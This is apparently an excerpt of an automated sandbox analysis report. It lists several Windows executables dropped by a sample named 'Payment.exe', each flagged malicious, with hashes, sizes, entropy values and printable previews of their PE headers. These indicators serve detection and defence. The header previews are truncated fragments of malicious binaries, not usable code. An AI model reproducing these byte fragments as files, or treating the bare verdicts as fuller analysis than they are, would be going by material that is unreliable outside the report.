                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:hNmt0LDILi2T1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:0LiKVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:BD5746AFDEA2797530069BB0CD779224
                                                                                                                                                                                                                                                                                                                                          SHA1:AE46A54E00BC763E9384F9CF883181C7BD2F3CA6
                                                                                                                                                                                                                                                                                                                                          SHA-256:20BBA6640A732C4F1E0EA883500F990D80D03125F9D82785E697ECF9C4B795E9
                                                                                                                                                                                                                                                                                                                                          SHA-512:6AE9B1F5BADAF50E1F9A05A82DD518F404D13D2792205AF7A2DCCC0F0BBF599A384BE60E04F3844EEF5538451442615AA5384100D73542AC143C1430454F577B
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1656320
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.333228313715965
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:hNmt0LDILi2T1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:0LiKVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:04F595D388A8C7479C272CBB00D963AB
                                                                                                                                                                                                                                                                                                                                          SHA1:374D439415BB0D2B286D7ED2B808A87F6832B52C
                                                                                                                                                                                                                                                                                                                                          SHA-256:DA392FCB56B39344AFC620585C70E7B8CEDBB061ECE7532B5C93C5384442C0F5
                                                                                                                                                                                                                                                                                                                                          SHA-512:D1E4E5AA200C14C94795542C6AFDDBA78F8BBF5B9FAA288B549E4E2DDB2CDFC3A4F725006FD54982C794735F40DAFC7C8BF50FF519D9DA7D721096F5628D979A
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................P........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1712128
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.309600684434423
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:SjuozyMGNUbTAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:6f6Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                                                                                                                                                                                          MD5:2CA7CDC615CD5DFDA7DCF5E692D7269E
                                                                                                                                                                                                                                                                                                                                          SHA1:B210692285C8998E023325F2FCAA771D17CACEB3
                                                                                                                                                                                                                                                                                                                                          SHA-256:496C06B6A72D754E8B39D8D0030655D93DA4173F884E209D5F77502CC4F38D2D
                                                                                                                                                                                                                                                                                                                                          SHA-512:8BB015893B8364E2AF1CFC08B6340634C88CDC09E1B422D1F38F5A318CC9F298C887EDCFD833995AC701C31F3BE946808933C684ECEA54F20C58A8016D1539D4
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.............................@............ .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):1864704
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.68789351425052
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:AbUO42Y/EBVg9N9JMlDlfjRiVuVsWt5MJMs:AHLgFIDRRAubt5M
                                                                                                                                                                                                                                                                                                                                          MD5:74D19F50735B5208A8F6050DE69ED1A1
                                                                                                                                                                                                                                                                                                                                          SHA1:E0ECAF795BBE38124A853D597BAE7B660145F5D5
                                                                                                                                                                                                                                                                                                                                          SHA-256:387DF7F756200749F2034BD5093A65362A5A927AF730D6C62FCEBA1EF08B21A1
                                                                                                                                                                                                                                                                                                                                          SHA-512:49CFCAAAD251278FED7F33E89690C1BD27AADE2EB2BB27D8DDAF42E356F712F318095CDACC38D6B407D64959DE5AEBE70907E0EB3CFB673428420CE0EB97741D
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.................................>............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc... ...........d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.961826193560219
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:
                                                                                                                                                                                                                                                                                                                                          MD5:FAA3A2F00AFCF2060350C22A0A608208
                                                                                                                                                                                                                                                                                                                                          SHA1:520F4905C93A2E1CBD52883064FDD2523FAB0128
                                                                                                                                                                                                                                                                                                                                          SHA-256:A5DB380CD7B22CCAB17EED680CAD3D8112411D5288E17F29D12EED2BDD7A7578
                                                                                                                                                                                                                                                                                                                                          SHA-512:9325B033B368AE2FEC77CCB44525D1095E87380E6F8ACB1107FFBD2102E7B354524ED16ECC5CB0052A95A55487FBE692031F53E55B145848DFBADE9E32045C8B
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Payment.exe
                                                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                          Size (bytes):4993536
                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.810469649250409
                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                          SSDEEP:98304:RlkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLtUf:nkkCqaE68eV+0ynE6LtUf
                                                                                                                                                                                                                                                                                                                                          MD5:EAC4F096370C6C122F5E013026A4345C
                                                                                                                                                                                                                                                                                                                                          SHA1:DB38ABB3D71EFC8DBA95903884C258DEB1EAEDD2
                                                                                                                                                                                                                                                                                                                                          SHA-256:30E0FFF04A16D9DD843785F2208673333A6554010DB7F584FEE69A60EDB56A9D
                                                                                                                                                                                                                                                                                                                                          SHA-512:751F1D9FC3DC05BA08401F168109E6A7FC4515010A88701D28C9A6FC4184A1D659C8751CC80503E42334C22C2F03BEFD75D8E772793B6263C84C311BF2048BCD
                                                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.......L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................